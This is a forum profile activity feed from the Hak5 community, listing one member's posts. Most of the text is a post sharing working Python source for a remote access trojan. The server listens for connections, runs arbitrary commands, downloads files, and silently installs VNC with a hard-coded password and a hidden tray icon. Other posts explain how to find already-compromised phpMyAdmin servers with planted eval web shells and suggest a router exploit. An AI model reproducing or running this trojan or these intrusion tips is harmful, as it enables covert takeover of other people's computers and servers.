DingleBerries
Dedicated Members-
Posts
1,291 -
Joined
-
Last visited
DingleBerries's Achievements
Newbie (1/14)
-
kajiji started following DingleBerries
-
Why not try the httpd exploit for dd-wrt? I dont know if it will work but it is worth a try.
-
OpenSSH <= 5.2 zero day exploit code - 48hrs until it is publicly released?
DingleBerries replied to foo's topic in Security
There are going to be a bunch more "0-days" over the next few months that are going to be bogus. Some of them now are nothing but malware. Be wary of what you run. -
I wish hak5 had down vote buttons.
-
source code?
-
Here is a RAT i have been working on in python. Its not done. Download Terry the Trojan and use that as the client to send/recieve data. from Tkinter import * from tkMessageBox import * from ScrolledText import * import socket import sys portvar = 2727 try: if sys.argv[1] == "/port": try: portvar = int(sys.argv[2]) except: portvar = 2727 except: portvar = 2727 def std(string): stdbox.config(state=NORMAL) stdbox.insert(END,"" + string + "\n") stdbox.config(state=DISABLED) def cnnect(var="poo"): sockt = socket.socket(socket.AF_INET,socket.SOCK_STREAM) success = 1 try: sockt.connect((ipbox.get(),portvar)) except: success = 0 std("Connection to " + ipbox.get() + " on port " + str(portvar) + " failed.") if success == 1: sockt.send(cmdbox.get()) retdata = sockt.recv(2048) std(retdata) root = Tk() root.title("Terry the Trojan") #FRAMES ipfrm = Frame(root) ipfrm.pack() cmdfrm = Frame(root) cmdfrm.pack() stdfrm = Frame(root) stdfrm.pack() #IP/Port Entry Widgets Label(ipfrm,text="Host/IP adress:").grid(row=1,column=1) ipbox = Entry(ipfrm,width=50) ipbox.grid(row=1,column=2) #Returned output widgets stdbox = ScrolledText(stdfrm,width=70,height=20,state=DISABLED,bg="#c0c0c0",fg="#000000") stdbox.grid(row=1,column=1) #Command sending widgets cmdbox = Entry(cmdfrm,width=50) cmdbox.grid(row=1,column=1) Button(cmdfrm,text="Send Command",command=cnnect).grid(row=1,column=2) cmdbox.bind("<Return>",cnnect) root.mainloop() HAH shit wrong code. Ill post it in a min. OK HERE is the RAT, sorry about that. You should be able to tell what the commands do. import socket,os,sys,urllib,re,ftplib from time import sleep port = 2727 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sockt = socket.socket(socket.AF_INET,socket.SOCK_STREAM) sockt.bind(('',port)) sockt.listen(1) while True: channel, details = sockt.accept() command = channel.recv(2048) if command == "kill": channel.send("Server trojan has been closed.") sys.exit() elif command == "ip": connect = s.connect(("www.whatismyipaddress.com", 80)) s.send('GET / HTTP/1.0\n\n') socketlines = s.recv(2048) lines = socketlines.split() ip = lines[len(lines) - 1] channel.send(ip) elif command == "whoami": channel.send(os.environ["USERNAME"]) elif command == "drive": channel.send(os.environ["HOMEDRIVE"]) elif command == "userfolder": channel.send(os.environ["HOMEPATH"]) elif command == "installvnc": urllib.urlretrieve('http://downloads.sourceforge.net/vnc-tight/tightvnc-1.3.10-setup.exe','update.exe') fs=os.popen3('update.exe /sp- /verysilent','b') sleep(1) fs=os.popen3('REG ADD HKLM\SOFTWARE\ORL\WinVNC3 /v Password /t Binary /d 68,DF,59,F8,C5,23,54,33','b') sleep(1) fs=os.popen3('REG ADD HKCU\SOFTWARE\ORL\WinVNC3 /v Password /t Binary /d 68,DF,59,F8,C5,23,54,33','b') sleep(0.2) fs=os.popen3('REG ADD HKCU\SOFTWARE\ORL\WinVNC3 /v DisableTrayIcon /t REG_DWORD /d 1','b') sleep(0.5) fs=os.popen3('REG ADD HKLM\SOFTWARE\ORL\WinVNC3 /v DisableTrayIcon /t REG_DWORD /d 1','b') sleep(1) fs=os.popen3('REG ADD HKLM\SOFTWARE\ORL\WinVNC3 /v RemoveWallpaper /t REG_DWORD /d 0','b') sleep(0.3) fs=os.popen3('REG ADD HKCU\SOFTWARE\ORL\WinVNC3 /v RemoveWallpaper /t REG_DWORD /d 0','b') sleep(1) fs=os.popen3('net start "VNC Server"','b') fs=os.popen3('del update.exe','b') channel.send("VNC was installed, password is vncserv.") elif command == "netstat": fs=os.popen3('netstat -ano>windsys.ini','b') sleep(2) f = open('windsys.ini') channel.send(f.read()) f.close() elif command == "whereami": channel.send(os.getcwd()) elif command.startswith("download "): file = command.replace("download ", "") urllib.urlretrieve(file,"file.exe") channel.send("File downloaded. Saved as 'file.exe', rename extension") else: csuc = 1 try: fs=os.popen3(command,'b') except: csuc = 0 if csuc == 1: channel.send("Command Sucessful") else: channel.send("Command Failed") channel.close()
-
To much processing power. You will need a big ass router.
-
Mine was 1<3m4|\|U3)
-
The pwnies being the pwned?
-
If you could get Airpwn running on a fon or other FOSS router then I think that would be more than enough.
-
The server hosting Hak5.org and the Hak5 forums was hacked.
DingleBerries replied to VaKo's topic in Everything Else
I havent played around with PHPbb, but I know other forums that send you a reset link. If anything I'd expected to receive a temporary password and be asked to change it. I just hope that the password I am sent is hashed in the db after it has been sent to me. Just saw you post Vako. Glad they were hashed. Good luck BFing the good ones. -
Python can do that with ease. This code does it for google groups but can be easily modified to fit your needs.
-
Darren has the complied version of it on his site, link. I also have the AESkey find compiled if anyone needs that.
-
My favorite way is to use the "Welcome to phpMyAdmin" AND " Create new database" dork and find databases that have already been poped. Look for <?php eval($_POST[cmd]);?> And try to find the page where you send commands. That or root the box your self from there.
-
The server hosting Hak5.org and the Hak5 forums was hacked.
DingleBerries replied to VaKo's topic in Everything Else
Why am I being email a plain text password when I try to recover my account? I know that I should change it but I am not sure if other are sure about what to do. -
http://twitter.com/hak5darren/status/1664879332 If you havent solved it dont try to help with it.